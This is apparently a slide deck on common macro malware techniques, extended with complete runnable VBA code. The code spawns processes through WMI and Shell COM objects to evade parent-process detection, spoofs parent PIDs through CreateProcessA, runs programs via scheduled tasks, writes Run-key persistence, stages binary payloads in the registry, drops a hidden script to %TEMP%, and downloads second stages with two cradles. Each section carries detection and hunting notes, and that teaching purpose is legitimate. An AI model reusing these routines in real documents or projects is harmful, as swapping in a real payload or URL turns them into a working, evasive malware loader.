13. • This behavior is relatively anomalous and can easily be detected by most modern blue teams.
9/16/2019 Macro malware - common techniques 13
14. Spawning via WmiPrvse.exe using WMI
https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes
• The new process is spawned by the WMI provider host (wmiprvse.exe) rather than
the Office process, so parent/child rules keyed on winword.exe or excel.exe do
not fire. The call that does this is Win32_Process.Create (documented at the link above).
15. Spawning via ShellCOM
• https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
• https://github.com/tyranid/oleviewdotnet (James Forshaw)
16. Spawning via ShellCOM
• Sample code using ShellBrowserWindow:
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
17. Spawning via ShellCOM
• Sample code using ShellWindows:
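The three spawn routes from slides 14, 16 and 17 side by side, as an added example written for this page rather than code from the deck or the linked posts. The command lines (notepad.exe) are placeholders; the CLSIDs are the documented ones for ShellWindows and ShellBrowserWindow, both hosted by explorer.exe. Run Demo from a macro-enabled document in a lab VM and compare the ParentImage field of the resulting Sysmon Event ID 1 records.

```vba
Option Explicit

' Added example, not code from the original deck. Three ways a macro can launch
' a child so that its recorded parent is not the Office process.

' Slide 14: Win32_Process.Create through the WMI moniker. The provider host
' creates the process, so telemetry records wmiprvse.exe as the parent.
Public Function SpawnViaWmi(ByVal cmdLine As String) As Long
    Dim wmi As Object, proc As Object
    Dim pid As Variant, rc As Long
    Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set proc = wmi.Get("Win32_Process")
    ' Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId)
    rc = proc.Create(cmdLine, Null, Null, pid)
    If rc <> 0 Then Err.Raise vbObjectError + rc, "SpawnViaWmi", "Win32_Process.Create returned " & rc
    SpawnViaWmi = CLng(pid)
End Function

' Slide 17: ShellWindows (CLSID 9BA05972-...). Item() with no index, as in the
' DCOM write-up linked on slide 15, hands back a shell window whose
' Document.Application is the Shell object inside explorer.exe, so ShellExecute
' runs the child under explorer.exe.
Public Sub SpawnViaShellWindows(ByVal exe As String, ByVal args As String)
    Dim sw As Object
    Set sw = GetObject("new:9BA05972-F6A8-11CF-A442-00A0C90A8F39")
    ' ShellExecute(File, vArgs, vDir, vOperation, vShow); vShow 0 = hidden window
    sw.Item().Document.Application.ShellExecute exe, args, "C:\Windows\System32", "open", 0
End Sub

' Slide 16: ShellBrowserWindow (CLSID C08AFD90-...) instantiated out of process
' in explorer.exe; same effect, one object hop fewer.
Public Sub SpawnViaShellBrowserWindow(ByVal exe As String, ByVal args As String)
    Dim sbw As Object
    Set sbw = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
    sbw.Document.Application.ShellExecute exe, args, "C:\Windows\System32", "open", 0
End Sub

Public Sub Demo()
    Debug.Print "WMI child PID: " & SpawnViaWmi("notepad.exe")
    SpawnViaShellWindows "notepad.exe", ""
    SpawnViaShellBrowserWindow "notepad.exe", ""
End Sub
```

All three only move the parent; the command line and the Office process's own COM and WMI activity stay visible. Useful hunts are wmiprvse.exe spawning shells (Event ID 1 with ParentImage wmiprvse.exe and a cmd, powershell or script-host child) and explorer.exe children with unusual command lines created while an Office process was open.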
18. Parent PID Spoofing with CreateProcessA
• CreateProcessA's lpStartupInfo parameter can point to a STARTUPINFOEX structure
(dwCreationFlags must then include EXTENDED_STARTUPINFO_PRESENT). Its attribute
list can carry PROC_THREAD_ATTRIBUTE_PARENT_PROCESS with a handle to another
process, which is recorded as the child's parent, so the child appears under,
say, explorer.exe rather than the Office process.
– lpStartupInfo points to a STARTUPINFOEX structure (STARTUPINFO followed by lpAttributeList)
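The same technique carried out end to end from VBA, as an added example that is not the deck's own code. It assumes VBA7 (Office 2010 or later, 32- or 64-bit, hence LongPtr), locates the spoofed parent with WMI, and uses explorer.exe and notepad.exe as placeholders. Lab use only.

```vba
Option Explicit

' Added example, not code from the original deck: parent-PID spoofing via
' CreateProcessA + STARTUPINFOEX + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As LongPtr
    lpDesktop As LongPtr
    lpTitle As LongPtr
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As LongPtr
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

' STARTUPINFOEX: STARTUPINFO plus the attribute-list pointer. This is what
' lpStartupInfo must point at when EXTENDED_STARTUPINFO_PRESENT is passed.
Private Type STARTUPINFOEX
    StartupInfo As STARTUPINFO
    lpAttributeList As LongPtr
End Type

Private Declare PtrSafe Function OpenProcess Lib "kernel32" ( _
    ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPtr
Private Declare PtrSafe Function InitializeProcThreadAttributeList Lib "kernel32" ( _
    ByVal lpAttributeList As LongPtr, ByVal dwAttributeCount As Long, ByVal dwFlags As Long, _
    ByRef lpSize As LongPtr) As Long
Private Declare PtrSafe Function UpdateProcThreadAttribute Lib "kernel32" ( _
    ByVal lpAttributeList As LongPtr, ByVal dwFlags As Long, ByVal Attribute As LongPtr, _
    ByVal lpValue As LongPtr, ByVal cbSize As LongPtr, ByVal lpPreviousValue As LongPtr, _
    ByVal lpReturnSize As LongPtr) As Long
Private Declare PtrSafe Sub DeleteProcThreadAttributeList Lib "kernel32" (ByVal lpAttributeList As LongPtr)
Private Declare PtrSafe Function CreateProcessA Lib "kernel32" ( _
    ByVal lpApplicationName As String, ByVal lpCommandLine As String, _
    ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, _
    ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, _
    ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFOEX, _
    ByRef lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As LongPtr) As Long

Private Const PROCESS_CREATE_PROCESS As Long = &H80
Private Const PROC_THREAD_ATTRIBUTE_PARENT_PROCESS As Long = &H20000
Private Const EXTENDED_STARTUPINFO_PRESENT As Long = &H80000

' First PID whose image name matches, or 0 when none is running.
Private Function FindPid(ByVal imageName As String) As Long
    Dim p As Object
    For Each p In GetObject("winmgmts:\\.\root\cimv2").ExecQuery( _
            "SELECT ProcessId FROM Win32_Process WHERE Name='" & imageName & "'")
        FindPid = p.ProcessId
        Exit Function
    Next p
End Function

' Creates cmdLine with parentPid recorded as its parent; returns the child PID.
Public Function SpawnUnderParent(ByVal cmdLine As String, ByVal parentPid As Long) As Long
    Dim hParent As LongPtr, attrSize As LongPtr
    Dim attrBuf() As Byte
    Dim si As STARTUPINFOEX, pi As PROCESS_INFORMATION

    ' PROCESS_CREATE_PROCESS is all the access the attribute needs (same user, not higher integrity).
    hParent = OpenProcess(PROCESS_CREATE_PROCESS, 0, parentPid)
    If hParent = 0 Then Err.Raise vbObjectError + 1, "SpawnUnderParent", "OpenProcess failed"

    ' Size query (returns FALSE by design), then allocate and initialise the list.
    InitializeProcThreadAttributeList 0, 1, 0, attrSize
    ReDim attrBuf(0 To CLng(attrSize) - 1)
    si.lpAttributeList = VarPtr(attrBuf(0))
    If InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, attrSize) = 0 Then _
        Err.Raise vbObjectError + 2, "SpawnUnderParent", "InitializeProcThreadAttributeList failed"

    ' The attribute value is a pointer to the parent HANDLE; cbSize = sizeof(HANDLE).
    If UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, _
                                 VarPtr(hParent), LenB(hParent), 0, 0) = 0 Then _
        Err.Raise vbObjectError + 3, "SpawnUnderParent", "UpdateProcThreadAttribute failed"

    si.StartupInfo.cb = LenB(si)   ' sizeof(STARTUPINFOEX), padding included
    If CreateProcessA(vbNullString, cmdLine, 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT, 0, _
                      vbNullString, si, pi) = 0 Then _
        Err.Raise vbObjectError + 4, "SpawnUnderParent", "CreateProcessA failed, Win32 error " & Err.LastDllError

    DeleteProcThreadAttributeList si.lpAttributeList
    CloseHandle pi.hThread
    CloseHandle pi.hProcess
    CloseHandle hParent
    SpawnUnderParent = pi.dwProcessId
End Function

Public Sub Demo()
    Debug.Print "child PID: " & SpawnUnderParent("notepad.exe", FindPid("explorer.exe"))
End Sub
```

Two caveats for the defender. The spoofed parent must be openable with PROCESS_CREATE_PROCESS, so the technique cannot borrow a parent running as another user or at a higher integrity level. And while Sysmon's ParentImage in Event ID 1 reflects the spoofed parent, the kernel process-creation callback also reports the creating thread, which is how EDRs flag the mismatch; a macro that declares kernel32 functions such as CreateProcessA and UpdateProcThreadAttribute is itself a strong static indicator.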
19. Sample in the wild
https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/
26. • VBScript can also create Scheduled Tasks. This can be abused to detach the
launched program from Office activity: the Task Scheduler service (running in
svchost.exe) starts the task's action, so the Office process is not its parent.
– Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger-example--scripting-
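A one-shot time-triggered task registered from VBA through the Task Scheduler COM interface, modelled on the Microsoft scripting example linked above. This is an added example, not the deck's code; the task name, delay and command are placeholders, and RemoveTask is included so the lab host is left clean.

```vba
Option Explicit

' Added example, not code from the original deck: register a task that the Task
' Scheduler service launches on our behalf a few seconds from now.

Private Const TASK_ACTION_EXEC As Long = 0
Private Const TASK_TRIGGER_TIME As Long = 1
Private Const TASK_CREATE_OR_UPDATE As Long = 6
Private Const TASK_LOGON_INTERACTIVE_TOKEN As Long = 3

' Returns the IRegisteredTask object for the new task.
Public Function RegisterTimedTask(ByVal taskName As String, ByVal exePath As String, _
                                  ByVal args As String, ByVal delaySeconds As Long) As Object
    Dim svc As Object, root As Object, task As Object
    Dim trig As Object, act As Object
    Dim startAt As Date

    Set svc = CreateObject("Schedule.Service")
    svc.Connect                          ' local machine, current user
    Set root = svc.GetFolder("\")

    Set task = svc.NewTask(0)
    task.RegistrationInfo.Description = "Added example task"
    task.Settings.Enabled = True
    task.Settings.StartWhenAvailable = True
    task.Settings.Hidden = False         ' malware typically sets True

    ' Time trigger: fire once, delaySeconds from now. StartBoundary is ISO 8601.
    startAt = DateAdd("s", delaySeconds, Now)
    Set trig = task.Triggers.Create(TASK_TRIGGER_TIME)
    trig.StartBoundary = Format(startAt, "yyyy-mm-dd\Thh:nn:ss")
    trig.Enabled = True

    ' Exec action: this is what svchost.exe (Schedule service) will launch.
    Set act = task.Actions.Create(TASK_ACTION_EXEC)
    act.Path = exePath
    act.Arguments = args

    ' RegisterTaskDefinition(path, definition, flags, userId, password, logonType)
    ' Omitted user/password plus INTERACTIVE_TOKEN = run as the current logged-on user.
    Set RegisterTimedTask = root.RegisterTaskDefinition( _
        taskName, task, TASK_CREATE_OR_UPDATE, , , TASK_LOGON_INTERACTIVE_TOKEN)
End Function

Public Sub RemoveTask(ByVal taskName As String)
    Dim svc As Object
    Set svc = CreateObject("Schedule.Service")
    svc.Connect
    svc.GetFolder("\").DeleteTask taskName, 0
End Sub

Public Sub Demo()
    Dim t As Object
    Set t = RegisterTimedTask("ExampleMacroTask", "C:\Windows\System32\notepad.exe", "", 30)
    Debug.Print "registered " & t.Path & ", state " & t.State
    ' RemoveTask "ExampleMacroTask"   ' run after the trigger has fired
End Sub
```

The parent/child picture changes (svchost.exe spawns notepad.exe), but the registration itself is well logged: Microsoft-Windows-TaskScheduler/Operational Event ID 106, Security 4698 when object auditing is enabled, and the task XML left under C:\Windows\System32\Tasks. Correlating a task registered by an Office process with the action it launches is the obvious hunt.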
27. Sample in the wild
https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14
28. Extract the VBA macro code
31. A sample of APT32 (aka OceanLotus)
https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
37. • VBScript also gives access to the registry (through WMI's StdRegProv class
or the WScript.Shell object), allowing a macro to store payloads, modify
settings and create persistence entries directly.
– Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--registry
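Both registry paths the slide mentions, as an added example rather than the deck's code: WScript.Shell for a string Run-key entry, and the WMI StdRegProv class (the linked reference) for storing a binary blob. The key path, value names and the four payload bytes are placeholders constructed for this example; Demo cleans up after itself.

```vba
Option Explicit

' Added example, not code from the original deck: registry access from a macro.

Private Const HKEY_CURRENT_USER As Long = &H80000001
Private Const RUN_KEY As String = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\"

' --- WScript.Shell: simple string values, e.g. classic Run-key persistence ---
Public Sub WriteRunKeyWithWScript(ByVal valueName As String, ByVal cmd As String)
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.RegWrite RUN_KEY & valueName, cmd, "REG_SZ"
End Sub

Public Function ReadRunKeyWithWScript(ByVal valueName As String) As String
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    ReadRunKeyWithWScript = sh.RegRead(RUN_KEY & valueName)
End Function

Public Sub DeleteRunKeyWithWScript(ByVal valueName As String)
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.RegDelete RUN_KEY & valueName
End Sub

' --- StdRegProv over WMI: REG_BINARY values (payload staging) ---
Private Function RegProv() As Object
    Set RegProv = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
End Function

' payload is a Variant array of byte values, e.g. Array(&H4D, &H5A), as the
' StdRegProv documentation expects.
Public Sub StorePayloadWithWmi(ByVal subKey As String, ByVal valueName As String, ByVal payload As Variant)
    Dim reg As Object, rc As Long
    Set reg = RegProv()
    rc = reg.CreateKey(HKEY_CURRENT_USER, subKey)
    If rc <> 0 Then Err.Raise vbObjectError + rc, "StorePayloadWithWmi", "CreateKey returned " & rc
    rc = reg.SetBinaryValue(HKEY_CURRENT_USER, subKey, valueName, payload)
    If rc <> 0 Then Err.Raise vbObjectError + rc, "StorePayloadWithWmi", "SetBinaryValue returned " & rc
End Sub

Public Function LoadPayloadWithWmi(ByVal subKey As String, ByVal valueName As String) As Variant
    Dim data As Variant, rc As Long
    rc = RegProv().GetBinaryValue(HKEY_CURRENT_USER, subKey, valueName, data)
    If rc <> 0 Then Err.Raise vbObjectError + rc, "LoadPayloadWithWmi", "GetBinaryValue returned " & rc
    LoadPayloadWithWmi = data            ' Variant array of bytes
End Function

Public Sub DeleteKeyWithWmi(ByVal subKey As String)
    RegProv().DeleteKey HKEY_CURRENT_USER, subKey
End Sub

Public Sub Demo()
    Const keyPath As String = "Software\ExampleMacroDemo"
    Dim blob As Variant, i As Long, hexStr As String
    StorePayloadWithWmi keyPath, "blob", Array(&H4D, &H5A, &H90, &H0)   ' constructed placeholder bytes
    blob = LoadPayloadWithWmi(keyPath, "blob")
    For i = LBound(blob) To UBound(blob)
        hexStr = hexStr & Right("0" & Hex(blob(i)), 2) & " "
    Next i
    Debug.Print "HKCU\" & keyPath & "\blob = " & hexStr
    WriteRunKeyWithWScript "ExampleMacroDemo", "notepad.exe"
    Debug.Print "Run value: " & ReadRunKeyWithWScript("ExampleMacroDemo")
    DeleteRunKeyWithWScript "ExampleMacroDemo"
    DeleteKeyWithWmi keyPath
End Sub
```

The two paths look different in telemetry. A WScript.Shell write is performed by the Office process, so a Sysmon Event ID 13 shows winword.exe or excel.exe as the Image. A StdRegProv write is carried out inside the WMI provider host, so the same event shows WmiPrvSE.exe, which launders the registry write in the same way the WMI process-creation trick on slide 14 launders the parent.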
49. • Dropping files has its pros and cons. Writing to disk often means the
payload is scanned by antivirus and leaves forensic artefacts. Yet in most
breaches attackers still drop payloads to disk because of the convenience and
ease of obtaining a solid foothold in the network.
• In VBScript the FileSystemObject can be used to drop files.
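A minimal FileSystemObject dropper, written for this page as an added example (not the deck's or OceanLotus's code). It writes a text payload under the user's temp directory, hides it, and reads it back before deleting it; the folder name, file name and one-line payload are constructed placeholders.

```vba
Option Explicit

' Added example, not code from the original deck: dropping a file with the
' Scripting.FileSystemObject and the artefacts that leaves behind.

Private Const TEMPORARY_FOLDER As Long = 2   ' GetSpecialFolder: %TEMP%
Private Const ATTR_HIDDEN As Long = 2        ' File.Attributes bit

' Writes textPayload to <Temp>\<subDir>\<fileName> and returns the full path.
Public Function DropTextFile(ByVal subDir As String, ByVal fileName As String, _
                             ByVal textPayload As String) As String
    Dim fso As Object, ts As Object
    Dim dropDir As String, fullPath As String
    Set fso = CreateObject("Scripting.FileSystemObject")

    dropDir = fso.BuildPath(fso.GetSpecialFolder(TEMPORARY_FOLDER).Path, subDir)
    If Not fso.FolderExists(dropDir) Then fso.CreateFolder dropDir
    fullPath = fso.BuildPath(dropDir, fileName)

    ' CreateTextFile(FileName, Overwrite, Unicode); ANSI is what script hosts expect.
    Set ts = fso.CreateTextFile(fullPath, True, False)
    ts.Write textPayload
    ts.Close

    ' Hiding the dropped file is a common (and itself suspicious) tweak.
    fso.GetFile(fullPath).Attributes = fso.GetFile(fullPath).Attributes Or ATTR_HIDDEN
    DropTextFile = fullPath
End Function

' Reads the dropped file back and removes it (Force = True handles the hidden bit).
Public Function ReadBackAndDelete(ByVal fullPath As String) As String
    Dim fso As Object, ts As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set ts = fso.OpenTextFile(fullPath, 1)   ' 1 = ForReading
    ReadBackAndDelete = ts.ReadAll
    ts.Close
    fso.DeleteFile fullPath, True
End Function

Public Sub Demo()
    Dim p As String
    ' Constructed placeholder payload: a harmless one-line VBScript.
    p = DropTextFile("ExampleDrop", "stage2.vbs", _
                     "WScript.Echo ""constructed placeholder payload""" & vbCrLf)
    Debug.Print "dropped " & p
    Debug.Print ReadBackAndDelete(p)
End Sub
```

A file created this way is written by the Office process itself, so Sysmon Event ID 11 (FileCreate) carries winword.exe or excel.exe as the Image together with the full path. The ts.Write is also what gives antivirus its chance: the plaintext second stage sits on disk, however briefly, and the %TEMP% path plus a script extension is a well-worn combination.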
50. Another sample of #OceanLotus:
https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
57. • There are multiple ways VBScript can download content. The content can
then be dropped to disk, inserted into the registry or injected into memory.
• One of the most common and simplest methods is the MSXML2.XMLHTTP object,
with an ADODB.Stream to write the response body to a file.
• Another option is a direct API call: a simple VBScript download cradle can be
built on URLDownloadToFileA from urlmon.dll.
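Both cradles from the slide in runnable form, as an added example written for this page rather than taken from the deck. The URL and destination path in Demo are placeholders; the URLDownloadToFileA Declare assumes VBA7 (LongPtr).

```vba
Option Explicit

' Added example, not code from the original deck: two download cradles.

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Private Const S_OK As Long = 0
Private Const adTypeBinary As Long = 1
Private Const adSaveCreateOverWrite As Long = 2

' Cradle 1: MSXML2.XMLHTTP fetches the body, ADODB.Stream writes the bytes.
' Returns the number of bytes written.
Public Function DownloadWithXmlHttp(ByVal url As String, ByVal destPath As String) As Long
    Dim http As Object, stm As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", url, False          ' synchronous request
    http.Send
    If http.Status <> 200 Then _
        Err.Raise vbObjectError + http.Status, "DownloadWithXmlHttp", "HTTP " & http.Status

    Set stm = CreateObject("ADODB.Stream")
    stm.Type = adTypeBinary
    stm.Open
    stm.Write http.responseBody          ' responseBody is a byte array
    stm.SaveToFile destPath, adSaveCreateOverWrite
    DownloadWithXmlHttp = stm.Size
    stm.Close
End Function

' Cradle 2: one urlmon call. The download goes through the IE/WinINet cache,
' so a copy can also appear under INetCache.
Public Function DownloadWithUrlmon(ByVal url As String, ByVal destPath As String) As Boolean
    DownloadWithUrlmon = (URLDownloadToFileA(0, url, destPath, 0, 0) = S_OK)
End Function

Public Sub Demo()
    ' Placeholder URL and paths; point them at a host you control in a lab.
    Const src As String = "http://127.0.0.1:8000/stage2.bin"
    Dim tmp As String
    tmp = Environ$("TEMP")
    Debug.Print "xmlhttp bytes: " & DownloadWithXmlHttp(src, tmp & "\stage2_a.bin")
    Debug.Print "urlmon ok: " & DownloadWithUrlmon(src, tmp & "\stage2_b.bin")
End Sub
```

The two differ in their artefacts. The XMLHTTP request is made by the Office process with a WinINet user agent, so proxy logs show winword.exe-era traffic to the staging host, and ADODB.Stream.SaveToFile writes the file without a Zone.Identifier stream. URLDownloadToFileA typically does stamp the file with a Mark-of-the-Web Zone.Identifier and leaves a cache copy, which is why the first cradle is the one more often seen in macro malware.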